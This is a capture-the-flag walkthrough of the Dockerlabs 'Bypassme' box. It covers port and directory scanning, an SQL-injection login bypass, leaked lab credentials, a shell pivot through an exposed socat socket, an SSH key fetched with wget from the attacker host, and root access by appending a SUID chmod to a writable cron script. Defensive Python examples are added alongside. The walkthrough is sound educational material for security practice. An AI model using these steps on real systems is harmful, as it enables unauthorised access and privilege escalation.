
Dockerlabs-Bypassme

Tags: Dockerlabs, Linux
Author: HYH
A technology enthusiast focused on cybersecurity, penetration testing and CTF challenges, keen on documenting hands-on experience and sharing tools and techniques, and committed to continuous learning and growth.

Box Info

OS: Linux
Difficulty: Easy

Nmap

[root@kali] /home/kali/bypassme  
❯ nmap 172.17.0.2 -sV -A -p- 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b4:a8:42:e7:2b:2f:7a:f9:50:bd:6d:31:8e:36:54:7b (ECDSA)
|_  256 c0:ff:28:31:a3:0b:1a:3d:c3:5f:83:1b:3c:44:28:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-title: Login Panel
|_Requested resource was login.php
|_http-server-header: Apache/2.4.58 (Ubuntu)

Dirsearch

[root@kali] /home/kali/bypassme  
❯ dirsearch -u 172.17.0.2                     

Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://172.17.0.2/

[10:03:10] Scanning:                                                                                                                            
[10:03:11] 403 -   275B - /.php                                             
[10:03:18] 302 -     0B - /index.php  ->  login.php                         
[10:03:18] 302 -     0B - /index.php/login/  ->  login.php                  
[10:03:18] 200 -    2KB - /login.php                                        
[10:03:18] 403 -   275B - /logs                                             
[10:03:18] 403 -   275B - /logs/access_log                                  
[10:03:18] 403 -   275B - /logs/                                            
[10:03:18] 403 -   275B - /logs/access.log                                  
[10:03:18] 403 -   275B - /logs/error.log
[10:03:18] 403 -   275B - /logs/error_log
[10:03:18] 403 -   275B - /logs/liferay.log
[10:03:18] 403 -   275B - /logs/mail.log
[10:03:18] 403 -   275B - /logs/proxy_error_log
[10:03:18] 403 -   275B - /logs/proxy_access_ssl_log
[10:03:18] 403 -   275B - /logs/wsadmin.traceout
[10:03:18] 403 -   275B - /logs/errors.log
[10:03:18] 403 -   275B - /logs/www-error.log
[10:03:21] 403 -   275B - /server-status/                                   
[10:03:21] 403 -   275B - /server-status                                    
                                                                             
Task Completed                           

There is a /logs directory, but it cannot be viewed directly (403), so back to the login page.

SQL Injection

Tried sqlmap without success, so build the payload manually:

username: admin
password: admin' or '1'='1
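Why the payload above opens the login, and the fix, as an added example that is not from the original post: the summary notes the box's real check is a static comparison, so this models the classic concatenated-query case such a payload is aimed at, using a constructed in-memory SQLite table with a placeholder password.

```python
import sqlite3


def make_db():
    """Constructed in-memory user table; the password is a placeholder, not from the box."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'placeholder-secret')")
    return db


def login_vulnerable(db, username, password):
    """Builds the query by string concatenation: the quote in the payload closes
    the string literal and the injected OR makes the WHERE clause always true."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return db.execute(query).fetchone() is not None


def login_safe(db, username, password):
    """Parameterised query: the payload is compared as a literal password value."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' or '1'='1"
    print("vulnerable:", login_vulnerable(db, "admin", payload))  # True
    print("safe:", login_safe(db, "admin", payload))              # False
```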


This gets into the admin panel. The page source contains a comment saying a logs.txt exists, presumably under the /logs directory:

<!-- dev note: remember to secure logs.txt path before deploy -->


This yields several usernames and passwords; the one that logs in successfully is albert:

albert:NGxiM3J0MTIz


Own conx

Upload pspy to inspect processes. There is a cron job, but its file cannot be modified at this point; note that /home/conx/.cache/.sock is directly accessible.

albert@e4a0b1838d15:/tmp$ ./pspy64 
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d



Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/05/31 01:21:50 CMD: UID=1001  PID=80     | ./pspy64 
2025/05/31 01:21:50 CMD: UID=1001  PID=70     | -bash 
2025/05/31 01:21:50 CMD: UID=1001  PID=69     | sshd: albert@pts/0 
2025/05/31 01:21:50 CMD: UID=0     PID=58     | sshd: albert [priv] 
2025/05/31 01:21:50 CMD: UID=0     PID=57     | tail -f /dev/null 
2025/05/31 01:21:50 CMD: UID=1002  PID=54     | socat UNIX-LISTEN:/home/conx/.cache/.sock,fork EXEC:/bin/bash 
2025/05/31 01:21:50 CMD: UID=0     PID=50     | /usr/sbin/cron -P 
2025/05/31 01:21:50 CMD: UID=0     PID=44     | sshd: /usr/sbin/sshd [listener] 0 of 10-100 startups 
2025/05/31 01:21:50 CMD: UID=33    PID=33     | /usr/sbin/apache2 -k start 
2025/05/31 01:21:50 CMD: UID=33    PID=32     | /usr/sbin/apache2 -k start 
2025/05/31 01:21:50 CMD: UID=33    PID=31     | /usr/sbin/apache2 -k start 
2025/05/31 01:21:50 CMD: UID=33    PID=30     | /usr/sbin/apache2 -k start 
2025/05/31 01:21:50 CMD: UID=33    PID=29     | /usr/sbin/apache2 -k start 
2025/05/31 01:21:50 CMD: UID=0     PID=24     | /usr/sbin/apache2 -k start 
2025/05/31 01:21:50 CMD: UID=0     PID=1      | /bin/bash /etc/.start_services 


albert@e4a0b1838d15:/tmp$ socat - UNIX-CONNECT:/home/conx/.cache/.sock
id
uid=1002(conx) gid=1002(conx) groups=1002(conx)

Add an SSH key:

mkdir .ssh
cd .ssh
wget 172.17.0.1/authorized_keys
cd ..
chmod 700 .ssh


Root

Note that the file run by the cron job is writable:

conx@e4a0b1838d15:~$ cat /etc/cron.d/backup-cron 
* * * * * root bash /var/backups/backup.sh
conx@e4a0b1838d15:~$ ls -al /var/backups/backup.sh 
-rw-rw-r-- 1 conx root 246 May 22 15:47 /var/backups/backup.sh

Append a line that sets the SUID bit on bash:

conx@e4a0b1838d15:~$ echo 'chmod +s /bin/bash' >> /var/backups/backup.sh
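A defender's audit for the weakness used here, as an added example not from the original post: it parses cron.d lines of the form shown above and flags root jobs whose script can be written by a non-root principal, using a constructed stand-in for the filesystem (FAKE_FS) whose first entry mirrors the `ls -al` output for /var/backups/backup.sh.

```python
import shlex
import stat

# Constructed stand-in for the filesystem: path -> (owner, group, mode bits).
# The first entry mirrors what `ls -al` showed on the box for backup.sh.
FAKE_FS = {
    "/var/backups/backup.sh": ("conx", "root", 0o664),
    "/usr/local/bin/clean.sh": ("root", "root", 0o755),
}
INTERPRETERS = {"bash", "sh", "python3", "python", "perl"}

def script_from_command(command):
    """First path-like token of a cron command, skipping interpreter names and
    flags, so `bash /var/backups/backup.sh` yields the script path."""
    for token in shlex.split(command):
        if token not in INTERPRETERS and not token.startswith("-"):
            return token
    return None

def parse_cron_d_line(line):
    """Parse a /etc/cron.d line (five schedule fields, user, command); None for
    comments and malformed lines."""
    parts = line.split(None, 6)
    if line.lstrip().startswith("#") or len(parts) < 7:
        return None
    return {"user": parts[5], "command": parts[6]}

def is_risky(entry, fs):
    """True when a root job runs a script that a non-root principal can edit:
    non-root owner, writable by a non-root group, or world-writable."""
    path = script_from_command(entry["command"])
    if entry["user"] != "root" or path not in fs:
        return False
    owner, group, mode = fs[path]
    return bool(owner != "root"
                or (group != "root" and mode & stat.S_IWGRP)
                or mode & stat.S_IWOTH)

def audit(lines, fs):
    """Script paths of risky jobs among the given cron.d lines."""
    return [script_from_command(e["command"])
            for e in map(parse_cron_d_line, lines) if e and is_risky(e, fs)]

# Constructed sample modelled on /etc/cron.d/backup-cron from the box.
SAMPLE_CRON = [
    "* * * * * root bash /var/backups/backup.sh",
    "0 3 * * * root /usr/local/bin/clean.sh",
]
print(audit(SAMPLE_CRON, FAKE_FS))  # ['/var/backups/backup.sh']
```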


Summary

User: a simple SQL injection (really a static comparison), then connect to the sock file to get conx.
Root: modify the file executed by the cron job, adding SUID.
